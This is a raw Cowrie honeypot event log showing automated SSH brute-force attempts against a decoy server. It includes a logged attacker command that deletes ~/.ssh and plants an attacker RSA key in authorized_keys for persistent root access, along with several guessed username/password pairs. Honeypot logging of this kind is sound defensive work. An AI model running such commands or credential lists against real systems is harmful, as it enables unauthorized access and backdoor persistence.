{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:48:27.221122Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:27.221962Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36147,"dst_ip":"1.2.3.4","dst_port":22,"session":"21ed3b500b0c","protocol":"ssh","message":"New connection: 212.227.235.229:36147 (1.2.3.4:22) [session: 21ed3b500b0c]","sensor":"my-vps","timestamp":"2025-09-09T06:48:27.321415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:27.322433Z","src_ip":"212.227.235.229","session":"21ed3b500b0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:27.406617Z","src_ip":"212.227.235.229","session":"21ed3b500b0c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:48:27.783272Z","src_ip":"212.227.235.229","session":"21ed3b500b0c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:28.869700Z","src_ip":"212.227.235.229","session":"21ed3b500b0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36343,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd1ba8667d2b","protocol":"ssh","message":"New connection: 212.227.235.229:36343 (1.2.3.4:22) [session: fd1ba8667d2b]","sensor":"my-vps","timestamp":"2025-09-09T06:48:28.918477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:28.919464Z","src_ip":"212.227.235.229","session":"fd1ba8667d2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:28.986324Z","src_ip":"212.227.235.229","session":"fd1ba8667d2b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:48:29.294302Z","src_ip":"212.227.235.229","session":"fd1ba8667d2b"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:29.363565Z","src_ip":"212.227.235.229","session":"fd1ba8667d2b"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:29.364444Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50655,"dst_ip":"1.2.3.4","dst_port":22,"session":"110908c4c96f","protocol":"ssh","message":"New connection: 212.227.235.229:50655 (1.2.3.4:22) [session: 110908c4c96f]","sensor":"my-vps","timestamp":"2025-09-09T06:48:30.194427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:30.195128Z","src_ip":"212.227.235.229","session":"110908c4c96f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:30.437271Z","src_ip":"212.227.235.229","session":"110908c4c96f"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"password1","message":"login attempt [nagios/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:48:31.446068Z","src_ip":"212.227.235.229","session":"110908c4c96f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:32.690332Z","src_ip":"212.227.235.229","session":"110908c4c96f"}
{"eventid":"cowrie.session.closed","duration":31.23184823989868,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:42.537042Z","src_ip":"103.59.134.205","session":"edf0c43424ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50566,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7d8c90dc483","protocol":"ssh","message":"New connection: 212.227.125.160:50566 (1.2.3.4:22) [session: a7d8c90dc483]","sensor":"my-vps","timestamp":"2025-09-09T06:48:43.462423Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:43.523116Z","src_ip":"212.227.125.160","session":"a7d8c90dc483"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52182,"dst_ip":"1.2.3.4","dst_port":22,"session":"bac5622eb660","protocol":"ssh","message":"New connection: 212.227.235.229:52182 (1.2.3.4:22) [session: bac5622eb660]","sensor":"my-vps","timestamp":"2025-09-09T06:48:48.949602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:48.954262Z","src_ip":"212.227.235.229","session":"bac5622eb660"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:49.070102Z","src_ip":"212.227.235.229","session":"bac5622eb660"}
{"eventid":"cowrie.login.failed","username":"lenovo","password":"Welcome1","message":"login attempt [lenovo/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:48:49.535013Z","src_ip":"212.227.235.229","session":"bac5622eb660"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:50.655322Z","src_ip":"212.227.235.229","session":"bac5622eb660"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.134.205","src_port":57933,"dst_ip":"1.2.3.4","dst_port":23,"session":"875a2daca7a9","protocol":"telnet","message":"New connection: 103.59.134.205:57933 (1.2.3.4:23) [session: 875a2daca7a9]","sensor":"my-vps","timestamp":"2025-09-09T06:48:52.101177Z"}
{"eventid":"cowrie.session.closed","duration":32.329304218292236,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:49:24.430413Z","src_ip":"103.59.134.205","session":"875a2daca7a9"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":43606,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee33a21227a7","protocol":"ssh","message":"New connection: 157.20.207.165:43606 (1.2.3.4:22) [session: ee33a21227a7]","sensor":"my-vps","timestamp":"2025-09-09T06:49:26.824668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:49:26.825526Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:49:27.008645Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123321","message":"login attempt [root/qq123321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:49:27.782001Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:49:28.168351Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:49:28.169017Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:49:28.169886Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:49:28.354524Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:49:28.825653Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:49:28.826326Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:49:29.012710Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:49:29.013584Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":43614,"dst_ip":"1.2.3.4","dst_port":22,"session":"b698fbd7a7f2","protocol":"ssh","message":"New connection: 157.20.207.165:43614 (1.2.3.4:22) [session: b698fbd7a7f2]","sensor":"my-vps","timestamp":"2025-09-09T06:49:29.194775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:49:29.195426Z","src_ip":"157.20.207.165","session":"b698fbd7a7f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:49:29.379351Z","src_ip":"157.20.207.165","session":"b698fbd7a7f2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:49:30.158841Z","src_ip":"157.20.207.165","session":"b698fbd7a7f2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:49:31.345685Z","src_ip":"157.20.207.165","session":"b698fbd7a7f2"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":43628,"dst_ip":"1.2.3.4","dst_port":22,"session":"75a8d2d0c879","protocol":"ssh","message":"New connection: 157.20.207.165:43628 (1.2.3.4:22) [session: 75a8d2d0c879]","sensor":"my-vps","timestamp":"2025-09-09T06:49:31.528061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:49:31.528798Z","src_ip":"157.20.207.165","session":"75a8d2d0c879"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:49:31.712751Z","src_ip":"157.20.207.165","session":"75a8d2d0c879"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:49:32.488554Z","src_ip":"157.20.207.165","session":"75a8d2d0c879"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:49:32.674045Z","src_ip":"157.20.207.165","session":"ee33a21227a7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:49:32.675273Z","src_ip":"157.20.207.165","session":"75a8d2d0c879"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":37314,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d16d4038dba","protocol":"ssh","message":"New connection: 118.26.39.178:37314 (1.2.3.4:22) [session: 4d16d4038dba]","sensor":"my-vps","timestamp":"2025-09-09T06:49:32.950705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:49:32.953232Z","src_ip":"118.26.39.178","session":"4d16d4038dba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:49:33.147143Z","src_ip":"118.26.39.178","session":"4d16d4038dba"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:49:33.928015Z","src_ip":"118.26.39.178","session":"4d16d4038dba"}
